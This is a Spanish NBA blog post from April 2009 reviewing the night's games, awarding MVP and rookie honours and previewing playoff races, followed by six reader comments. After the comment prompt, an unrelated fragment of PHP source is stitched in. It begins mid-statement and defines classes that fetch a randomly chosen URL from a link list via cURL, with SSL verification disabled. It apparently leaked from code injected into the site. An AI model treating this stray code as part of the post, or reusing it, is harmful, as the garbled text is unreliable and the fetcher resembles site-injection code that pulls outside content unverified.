La Crónica (4/04/2009)

04 de April de 2009 por TheDeerHunter

Pues no parece que 38 minutos para Gasol y 39 para Kobe sea racionar demasiado la presencia de los titulares. Los Lakers finalmente queman los barcos por si suena la flauta y enganchan la primera plaza en el último momento. Lo cierto es que, excepto la visita al Rose Garden, el calendario es fantástico, pero ¿merece la pena el sobreesfuerzo?? Anoche el partido no fue bueno. Por primera vez en ni se sabe cuánto tiempo la primera opción ofensiva fue Pau que lanzó casi el doble que el mismísimo “24”. Kobe estuvo inusualmente concreto. La baja de Bynum ha despendolado un poco su sentido colectivo, probablemente de forma justificada tal y como está el personal en los Lakers… aunque no sabemos si fue antes el huevo o la gallina. El caso es que el resto está como la chata, aunque anoche, al menos vimos un buen Fisher… y un buen Mbenga!!! Por el contrario preocupa y mucho el rendimiento de Farmar y Vujacic. Los Rockets por su parte estuvieron flojos en el tiro, perdieron demasiados balones y no pudieron contar con la aportación de otros días de su segunda línea. Sensación de oportunidad perdida.

Los Cavs se estrellaron en Orlando. Los locales se cerraron y dejaron a Lebron y los suyos lanzar de lejos alegremente. Otra cosa era penetrar la zona, una auténtica jungla de brazos con el “gran tótem” en medio. Los Mo Williams, Gibson, West… cumplieron eficazmente con su cometido pero la naturaleza llama y este equipo no es capaz de llevar los partidos desde fuera. El resultado fue un muy buen 9/17 en triples, pero un 22/67 dentro y mientras tanto Orlando anotando como le daba la gana desde cualquier posición. Apostaría a que repetirán el invento llegado el caso que se enfrenten en la postemporada.

Pero la hazaña de Orlando no se pudo completar con la derrota de los Celtics. Impresionantes contra los siempre dificilísimos Hawks. Partidazo de matrícula de la tríada Perkins-Glen Davis-Moore, gran actuación de Rondo y Pierce y una defensa que mordía. Garnett no jugaba pero la actitud del equipo parece responder a la confianza de su jefe. Buenas señales, sin duda, en momentos delicados. Los Hawks por su parte, pasan un mal rato cada vez que ponen un pie en el Garden. Anoche no pudieron desplegar su juego, muy nerviosos e imprecisos. Ya habrá mejores momentos.

Para terminar en el Este los Heat confirmaron su plaza contra Charlotte en una victoria pírrica donde se lesionó hasta el utillero. O’neal, Beasley y Haslem tienen algunos días para recuperarse antes de que empiece la fiesta. Pasito atrás para los Bobcats.

En el Oeste sorprendente jornada donde hubo derrotas acojonantes. No fue el caso de San Antonio, encantados de tener a Ginobili de vuelta… eso sí, ni 6º hombre ni gaitas. De titular desde el principio dejándose la vida para ganar en Indianápolis. Comprobad vosotros mismos el box-score para ver cuál es la importancia que le da Popovic a estos partidos. Os lo digo yo. Mucha, como no puede ser de otra manera. Están como para dejarle más ventaja a Denver.

Portland también ganó en Oklahoma. Palizón a los Thunder con Aldridge en plan “demasié”. De Houston ya habíamos hablado antes… Tras la victoria de los Suns contra los Kings, tropezón combinado de Hornets, Jazz y, lo que es más importante, Dallas. Lo de los Hornets… bueno, se puede entender. Uno de esos partidos que les sale cara a los Warriors y tampoco es que te estés jugando la vida… pero lo de los Jazz en casa contra los Wolves y, sobre todo, lo de los Mavericks en Memphis es para tirarse de los pelos. Veremos si a alguno la broma no le sale por un pico.

Por último, mención a parte para la mejor jugada de la semana. Diría Dumars a Iverson… “Pero muchacho, si todos los problemas del mundo fueran tan fáciles de solucionar como el tuyo… A tu puñetera casa el resto de la temporada”. Ole por Dumars.

PREMIOS TJNBA:

MVP: No es que los Thunder supongan un increíble reto para ningún hombre alto… pero la destroza que hizo Aldridge anoche es para que en su casa le hayan grabado el partido. 35ptos 18rebotes, el angelito.

Rookie: No fue una gran noche para ellos, pero muy bien los rookies de Memphis para tumbar a los Mavs. Gasol bien y Mayo mejor, con 25ptos, 60% de acierto y 5 asistencias. Lástima que recupere el tono tan tarde.

La Sorpresa: La que armaron los Wolves en Salt Lake. Carney&Gomes 50ptos entre los dos con porcentajes extraordinarios.

La Decepción: Ver a Stojakovic arrastrarse con los Hornets. Para que nos hagamos una idea, es reserva de un tipo que anoche anotó un 0-5. Dicho así suena muy fuerte.

El mayor esfuerzo en vano: CP3 y West anotan 74 ptos. Entre sus 7 compañeros se juntan para producir 29. Hay que jod….

RAZONES PARA TRASNOCHAR

A estas alturas hay pocos duelos directos con equipos en lucha por algo en juego. Esta noche lo más interesante será quizás los partidos en donde se deciden “premios secundarios”:

7º-8º del Este: Los Bulls reciben a unos peligrosos Nets y los Pistons viajan a Philadelphia. El 8º tiene garantizado ver a Lebron, el 7º puede que juegue contra Boston sin Garnett…

5º-6º del Este: Los Sixers como hemos dicho contra los Pistons sin Iverson. Por su parte los Heat contra los Wizards que a la vejez viruelas…. y seguro que Arenas con ganas.

Magic-Hawks: Para los Hawks poco más que moral, pero los de Orlando siguen buscando la ventaja de campo en las teóricas semifinales de conferencia…

Clippers – Denver: no sé cuanto de importante va aser la ventaja de campo en el Oeste. Los rivales dan casi igual unos que otros para el 2º o 3º, pero asegurarte ventaja de campo en unas teóricas semis contra Spurs es pasar de teenr alguna oportunidad a no tener ninguna….

Comenta

6 comentarios a esta entrada

  1. Jabho dice:
    #1

    Vaya partido triste que jugaron los Cavs… Han aflojado porque venían muy lanzados y a ver si no lo pagan, que el domingo juegan contra los Spurs y una derrota les puede hacer perder el liderato de la liga cuando parecía que lo tenían claro.

    A los Celtics si se recupera Garnett les habrá venido relativamente bien la lesión para que los reservas vayan jugando y cogiendo confianza. Pero si no se recupera ….

    Los Lakers siguen finos aunque la sensación de que no hay segunda unidad es mala. De todas formas yo creo que la 2ª unidad es muy, muy importante es la liga regular que juegas muy a menudo, pero en PO con 6 o 7 tíos si están bien te sobra. Porque en PO Kobe va jugar 40 o más minutos cuando haga falta lo mismo que el resto de los importantes…Osea que si tienes gente en el banco que salga y aporte fenómeno, pero si no la tienes y los titulares no se lesionan tampoco es un mundo. Fundamental que vuelva Bynum, pero poco más…

      Citar

  2. Hakeem dice:
    #2

    Gran resumen!!!
    Hoy creo que ha estado clara la diferencia entre los Cavs,Lakers y Celtics.Los Cavs siguen siendo casi todo LeBron(¿Que pasaría si este chico se lesionase?)Los Lakers no son un caso tan grave.Si no esta Bryant enchufado,tranquilos que esta Gasol.Pero el banquillo falla…Y los Celtics,pues por algo son campeones.Las estrellas siempre responden(sobre todo Pierce…).¿Si falla Garnett?,ahi están Pierce y Allen.Luego encima ha surgido Rondo y la solidez de Perkins.Si encima sumamos que este equipo por fin tiene banquillo(Powe,Marbury,Glen Davis,House…)vemos la diferencia con los otros candidatos al anillo.Eso si,tranquilos que los chicos de Popovich un año mas van a estar ahí…Y Orlando y Utah pelearán seguro.
    Cambiando de tema,¿Creeis que el desastre de Dallas es solo culpa del equipo?Porque yo creo que el entrenador no esta gestionando muy bien la plantilla…Parece que solo esta Nowitzki y Terry con sus triples…
    Gran blog,enhorabuena y seguid asi 🙂

      Citar

  3. Fran Reyes dice:
    #3

    En los Cavaliers me parece casi decisiva la cuesta abajo de Ilgauskas, creo que no rinde ni mucho menos al nivel de antes. En los Celtics, creo que la vuelta de Garnett es imprescindible por muy bien que Moore se desempeñe; no olvidemos que el tío estaba sin equipo por algo. Y en los Lakers da un poco de cosa ver cómo ni Walton ni Mbenga ni Powell ni Farmar ni Vujacic son capaces de sustituir con algo de garantía a Ariza, Gasol, Odom, Fisher y Kobe. Morrison y Brown, por otra parte, tienen una presencia testimonial; no aportan nada, al menos nada que VladRad no aportara.

      Citar

  4. Miguel dice:
    #4

      Citar

  5. David dice:
    #5

    Hakeem decía: “Los Cavs siguen siendo casi todo LeBron(¿Que pasaría si este chico se lesionase?)”
    ¿Pero se puede lesionar? xD

    Estoy de acuerdo con Jabho en que 7 tíos te pueden llegar en PO; el problema es cuando esos 7 son los mismos toda la temporada. 7 tíos bien y buenos pueden llegar, pero ¿están bien? Habrá que verlo

      Citar

  6. UnderlocK dice:
    #6

    Yo pienso que si Bynum llega sano a Playoffs los Lakers van a ser muy favoritos. A pesar de que la 2ª unidad esta defraudando esta temporada. Pero como habeis comentado que 7 tios lo hagan bien puede ser suficiente.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>